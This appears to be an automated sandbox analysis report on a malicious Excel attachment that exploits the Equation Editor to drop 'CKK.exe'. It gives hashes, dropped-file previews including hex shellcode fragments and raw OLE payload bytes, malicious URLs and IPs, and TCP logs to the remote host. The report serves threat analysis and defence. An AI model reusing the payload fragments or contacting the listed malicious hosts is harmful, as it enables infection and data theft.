                                        https://gamma.app/docs/Untitled-9umekc4egyknsobGet hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/66336ffc6318519b93081379/663370167f943a5ca8cda723?signature=f078b55518dec9be5687b83cc67125e09d569e23f92457525770ae31d9667613Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                        • 172.67.129.30
                                        oO2wHSVFJM.exeGet hashmaliciousRisePro StealerBrowse
                                        • 104.26.5.15
                                        9d565bee-e6ce-1842-e729-b0df8f08ed34.emlGet hashmaliciousHTMLPhisherBrowse
                                        • 172.64.41.3
                                        http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                        • 162.159.61.3
                                        http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                        • 162.159.61.3
                                        http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                        • 162.159.61.3
                                        AS-COLOCROSSINGUSer).xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 192.3.109.135
                                        SAL_000268_DOM.xlsGet hashmaliciousUnknownBrowse
                                        • 198.12.81.162
                                        INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                        • 107.175.242.96
                                        5801.xlsGet hashmaliciousUnknownBrowse
                                        • 192.3.179.142
                                        GVV.exeGet hashmaliciousRemcosBrowse
                                        • 23.94.53.100
                                        Notice.xlsGet hashmaliciousUnknownBrowse
                                        • 192.3.239.4
                                        irlsheis.docGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 192.3.239.4
                                        Order Request1_5_24.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                        • 23.94.54.101
                                        202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                        • 23.94.53.100
                                        OWrVfOdM62.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 192.3.239.4

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        36f7277af969a6947a61ae0b815907a1SC-246214.docGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        OWrVfOdM62.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.26.12.205
                                        ET2431000075 & ET2431000076.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.26.12.205
                                        attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                        • 104.26.12.205
                                        NI-45733-D.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                        • 104.26.12.205
                                        Payment Swift.docGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        gmb.xlsGet hashmaliciousUnknownBrowse
                                        • 104.26.12.205
                                        scripttodo.ps1Get hashmaliciousUnknownBrowse
                                        • 104.26.12.205
                                        New Quotation.docGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                                        • 104.26.12.205

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Temp\Clinton

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\CKK.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):267776
                                        Entropy (8bit):7.871261495692861
                                        Encrypted:false
                                        SSDEEP:6144:vKPYhPrqcfpcB4qnSfMYmOeaNEj634MxhCMHhru:yPKJS42SfxmfaNEh+tJu
                                        MD5:5A70B0E741E9BE8A93A6353E6CDB6BBD
                                        SHA1:567C37816D5101104953F1CC5A9F0D74E78B9F5C
                                        SHA-256:AACE6CA3B7215B5BF87C91167D4FB7C008CE0F4B9FA3B77877F3123018D066F5
                                        SHA-512:E1F21571D366462B73C1B7B1954E70A99E13A651F470BDFBC42F9F0F86034CE60761379BC0EFF1ED78CF8C6FBF85C10AB38B3BB4819A34031ADE083833955723
                                        Malicious:false
                                        Reputation:low
                                        Preview:u..TDX6BWVHV..8H.TGX6BSV.VPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQT.X6B]I.XP.1.p.F..c.>!%p8J'6&&5.!28&9$hZ-q&26.+=v...hU'51iU;HwVHVPH8H9D.u.3.(d'.6.9.*u{I<l'.([..6z%.&.3.(.'.6.k?*[).<au!(.9.6cw<&.3.(.?3 .9.*GX6BSVHVPH8HQTGX..A0HVPHh.QT.Y2B'.H.PH8HQTGX.BpWCWYH8.PTG"4BSVHV..8HQDGX6.RVHV.H8XQTGZ6BVVHVPH8HTTGX6BSVH6TH8LQT.c4BQVH.PH(HQDGX6BCVHFPH8HQTWX6BSVHVPH8H.AEXfBSVH6RH..PTGX6BSVHVPH8HQTGX6BSVHVPH..PT[X6BSVHVPH8HQTGX6BSVHVPH8HQT.U4B.VHVPH8HQTGX6.RV.WPH8HQTGX6BSVHVPH8HQTGX6BSVf"50LHQT_.7BSFHVP.9HQPGX6BSVHVPH8HQTgX6"}$,7$)8H.9GX6.RVH8PH8.PTGX6BSVHVPH8H.TG..&2")VPH.xQTGx4BS@HVPB:HQTGX6BSVHVPHxHQ.i*E00VHV..9HQ4EX6.RVHvRH8HQTGX6BSVHV.H8.QTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX

                                        C:\Users\user\AppData\Local\Temp\aut9A3D.tmp

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\CKK.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):265430
                                        Entropy (8bit):7.978474061574863
                                        Encrypted:false
                                        SSDEEP:6144:1B28qzcAxd40Yn8M/jKbd37+/orNpicivLRDhrNuCIZr98YQuSUYk:1B2Xbd458xJ37+/orLicijRVBuCIZr91
                                        MD5:F2A14BB5825833AC7A44FA6F80757411
                                        SHA1:9D3AA84BA40B44968B3F69C38F950B55FF042053
                                        SHA-256:6854140A8F1472C3E84B6F1D6390920AE5737C67961E809DE10C34FEFD8663D4
                                        SHA-512:66C5273428E48F6C2E596E7300D169043567FBABFEBCD037446B0AC433EF779BA3D5A40F1E237AB1B0D3A43154563CB31AFA274A5A694E4CDC67C5DC993E7FFA
                                        Malicious:false
                                        Reputation:low
                                        Preview:EA06......5J%bmB...m~.qH..(...N...T)..ED.;4...N..Wi?*.C.1..=.h.....Hd...*O6.I..i..q&..-..m.M2.E.s.23..Ud.Y...;.]...9.p...Qd...I..Uu..g..>.Q[..f...M...%.@...k..r....u..>S....w.I.`..j.3... ...3.A...6.mF....R.."..9....W...4..B.T........8Q....H.8.R'.....6.U..3T....H.S*5M.iB...j."P.q....H..1b....-..X...U*FS{P.P.?...R....y.J.L.s...2..I..SY.0.8....*...p.Ni....W.g.M.W.$.o$..T..........G...Q...4.E)..o..E......)....x.Tr..U.a0..?....iE.M......Q.....%...;..?.D,u..2.Q.hq.).O#>....J...V.H.1.u......&k9..a3..^S...P.h.#{...Z~M..[.U...F...i.X......S,yH7.|..G.q.D.. ..=.j.V.T9..|f.G..w.:..._.~)y{..6.J.0..Co...k..L...R..PH..-.D't-f.o....4....[.Y..nD..p..@....%R..*3.,['P.......n.....&.v.V......."...W..U.T.Vj..."V*.K.[%.:.f.X.W@B.n.o.....;..{\.u..."........_U..R7...{...ou..Tz...".]..mB..!.*.&.M.u.....}*.L+.....v.69.j...H..xq..=r.P*....q...f[....E.H..k...t.Vj<...K.7..D...j......u.R:.@../....x..Z.X...f...b(`.........."...ji.n..a..g.W..~)r.Q....R.X...8ww-....5N<.g..g..*..

                                        C:\Users\user\AppData\Local\Temp\aut9AAC.tmp

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\CKK.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):9858
                                        Entropy (8bit):7.592762175866469
                                        Encrypted:false
                                        SSDEEP:192:C+cKAFEeHCTNT/Uy48+s5DFVZJfJiFF3uEiJWwfJFqS24:h7ACeHCTR2WBVZJBoNuEiJWwew
                                        MD5:52EA0D31E75E368B28CA2A58A9E653FC
                                        SHA1:2AE4801ACAA0FDA9FC8975C9C29DCE1C1C6204C0
                                        SHA-256:BDFFC8EA3EBB6411B678CA19E5DD6D1199B8C44BD8CE53E42A8D99933074DE2F
                                        SHA-512:8DD97AD2B44A01B3EA8E0221B82B97493CB832B22BC88802957DC90D9351466EF1FCA3F1CE25AB25C890C32F5C0B9950D642621A8E8138D37E32F995F5FFC993
                                        Malicious:false
                                        Reputation:low
                                        Preview:EA06..p0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

                                        C:\Users\user\AppData\Local\Temp\nondefinition

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\CKK.exe
                                        File Type:ASCII text, with very long lines (28720), with no line terminators
                                        Category:dropped
                                        Size (bytes):28720
                                        Entropy (8bit):3.5923337446806256
                                        Encrypted:false
                                        SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbiE+Ik6Ng4vfF3if6gyJ:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RT
                                        MD5:8285D336395C7B6E421735E4C8100590
                                        SHA1:BFEACB0473BEEA2DC4C9C634064467E1D0D70750
                                        SHA-256:2324E3F83072804CB47BAC17572DC6325B04BA13E6E4B0FD4AA40AAA45AA8D02
                                        SHA-512:FBAE37B6FB95499389ED67F6A630F91AE053DC1CE5EC79EADE84D10E79641C91074CA00BE90AD0D34B7C35355B9CDC7C3CA33842E0990D9E176CAC06DC311580
                                        Malicious:false
                                        Reputation:low
                                        Preview:048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

                                        C:\Users\user\AppData\Local\Temp\~$imgs.xlsx

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                        C:\Users\user\AppData\Roaming\CKK.exe

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1219072
                                        Entropy (8bit):7.1031978751916185
                                        Encrypted:false
                                        SSDEEP:24576:jqDEvCTbMWu7rQYlBQcBiT6rprG8aSI5LUWZ0o7F9CR:jTvC/MTQYxsWR7aSIdvTnC
                                        MD5:6DBF70053A37B13C106C623E0934DDFF
                                        SHA1:1362F71BAC0D64092F13F5F9B84E235D6A369055
                                        SHA-256:5D4011E1B0A3CDC0052863536E959285012767BE9A39FFB95FAF811836536922
                                        SHA-512:3A4EC594D47FCC5551010D5E20FC5B317CC98C9C0DBD46F94B6F96002445C4E63DB649B4579E72C07A9DC24192FD07B7F84B0D1970C7729CEB7FFDB04D51F2CF
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 39%
                                        • Antivirus: Virustotal, Detection: 40%, Browse
                                        Reputation:low
                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...}a3f..........".................w.............@..................................N....@...@.......@.....................d...|....@.......................p...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@...0..................@..@.reloc...u...p...v...$..............@..B........................................................................................................................................................................................................................................................................

                                        C:\Users\user\Desktop\~$PO 2_5_24.xlam.xls

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                        C:\Users\user\Desktop\~$PO 2_5_24.xlam.xlsx

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                        Static File Info

                                        General

                                        File type:Microsoft Excel 2007+
                                        Entropy (8bit):7.997957049004658
                                        TrID:
                                        • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                        • ZIP compressed archive (8000/1) 16.67%
                                        File name:PO 2_5_24.xlam.xlsx
                                        File size:735'951 bytes
                                        MD5:989feda4871b86bfbcec9debb0b2ec45
                                        SHA1:05ef3f9b7d77b9709423222a81d670cbcae013cd
                                        SHA256:26fcc106f92623f06b5eb2e87b2e2e58a2ad9eea51de7d15a15b85dafe44b937
                                        SHA512:ba62b7d1cc358aa8e3525bbb0988274823feef6f485cc9ec2d5d43734c35f0f1d9c978bed490ea6b4cfc25e86a4df5788be8b3bbb3677064be3895d3becd4c44
                                        SSDEEP:12288:r8nWilHGpyCdswU+rUUfvPn9mw1Z68YnQgtJPskWBMpINmNGWBn:Y/0RuFLUfvPn9tk8E7xWuWLWBn
                                        TLSH:9CF43323D1B217AAC2EFC0559C403CC919F1BD1C9377708EBE35D85725E6AE4A658F82
                                        File Content Preview:PK...........X.lc.............[Content_Types].xmlUT.....3f..3f..3f.U.n.0....?..........C..E.&...X.k.6_ .......(...!_......b5...]l0D.l....+..'.mk...g...1.......0......O;.. ..5.R.?8..C..r.-E...H..Z.A..E.u6.....m*S.`..;\..N...>..4...v..R5.....(.7V..).r..J'..

                                        File Icon

                                        Icon Hash:2562ab89a7b7bfbf

                                        Static OLE Info

                                        General

                                        Document Type:OpenXML
                                        Number of OLE Files:1

                                        OLE File "PO 2_5_24.xlam.xlsx"

                                        Indicators
                                        Has Summary Info:
                                        Application Name:
                                        Encrypted Document:False
                                        Contains Word Document Stream:False
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:False
                                        Flash Objects Count:0
                                        Contains VBA Macros:False
                                        Summary
                                        Author:SHINY
                                        Last Saved By:X10LUXURY
                                        Create Time:2010-06-04T08:55:28Z
                                        Last Saved Time:2023-07-30T22:56:25Z
                                        Creating Application:Microsoft Excel
                                        Security:0
                                        Document Summary
                                        Thumbnail Scaling Desired:false
                                        Company:Grizli777
                                        Contains Dirty Links:false
                                        Shared Document:false
                                        Changed Hyperlinks:false
                                        Application Version:15.0300

                                        Streams

                                        Stream Path: \x1ole10nATIVe, File Type: data, Stream Size: 1031663
                                        General
                                        Stream Path:\x1ole10nATIVe
                                        CLSID:
                                        File Type:data
                                        Stream Size:1031663
                                        Entropy:5.887888766747677
                                        Base64 Encoded:True
                                        Data ASCII:A . . W $ 2 . . . . . G M ) O . ? U . B . . I o ! . . . E . . f S . E . . . . . . . = G . . . / . . . . v U . . . . . . . . . . 2 " ] > . y . ( 1 ] . : i ' I . J 6 ) . . . C . A + 7 . . . . | . $ . . X v . , k . _ _ . . . } T S 9 . x e . . . . y 1 J . ; . X . o Z b X [ . L . . } . | + ] 3 . 7 ? ~ 1 a 8 y u u . . [ . @ ) u ' . Z n . f & K 9 . . . X A ^ . b 5 z / P Q + . % W N | . c . d + ~ 2 D . L c . w . ` . ] ; ^ . . ) . / z . g C N . i 8 . c ) . W i . z . . Z . 4 . ) ' . l K . . ( . k 9 . c . i . d
                                        Data Raw:8d bb 41 03 02 57 24 32 c8 d8 01 08 df b2 bd 7f fd f5 9d 81 e5 7f bf 47 20 8b 4d bd 8b 29 bf 4f 98 b9 ff f7 d7 8b 3f 55 ff d7 83 c0 42 ff e0 b3 8c f2 18 49 f3 d6 6f 21 0b c2 bf 14 45 00 0e ff 80 fd 66 53 1c a5 eb 45 8d 85 15 04 00 00 e9 a6 00 00 00 eb f3 eb 3d eb 47 e9 b1 00 00 00 eb 2f eb 18 e9 9e 00 00 00 e9 80 eb 76 eb 55 e9 91 00 00 00 eb 06 eb 04 eb 09 eb ce eb d7 e9 a4 00 00
                                        Stream Path: HYgP2BL0oQEr, File Type: empty, Stream Size: 0
                                        General
                                        Stream Path:HYgP2BL0oQEr
                                        CLSID:
                                        File Type:empty
                                        Stream Size:0
                                        Entropy:0.0
                                        Base64 Encoded:False
                                        Data ASCII:
                                        Data Raw:

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 2, 2024 17:39:45.660633087 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:45.770174980 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.770526886 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:45.771538019 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:45.883047104 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.883065939 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.883079052 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.883085966 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.883198977 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:45.992738008 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.992767096 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.992786884 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.992806911 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.992814064 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:45.992830038 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.992846012 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:45.992855072 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.992876053 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.992894888 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:45.992897034 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:45.992938042 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.105245113 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105268955 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105283022 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105295897 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105309010 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105320930 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105334044 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105345964 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105355024 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.105359077 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105379105 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105381012 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.105391979 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.105391979 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105407953 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105422974 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105431080 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.105437994 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105451107 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105459929 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.105463028 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.105493069 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.108309031 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.215398073 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215434074 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215460062 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215477943 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.215527058 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215539932 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215569973 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.215599060 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215612888 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215641975 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215662956 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.215701103 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215745926 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.215775967 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215837002 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215879917 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.215903997 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215917110 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.215946913 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.215971947 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216044903 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216058016 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216084957 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216089010 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.216146946 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216180086 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216191053 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.216214895 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216258049 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216259003 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.216285944 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216321945 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216325998 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.216363907 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216403008 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216408014 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.216428995 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216470957 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216471910 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.216515064 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216527939 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216557980 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.216578007 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216620922 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.216622114 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.217696905 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.325017929 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.325032949 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.325077057 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.325083017 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.325112104 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.325155020 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.325180054 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.325237989 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.325284958 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.325284958 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.325300932 CEST804916123.94.54.101192.168.2.22
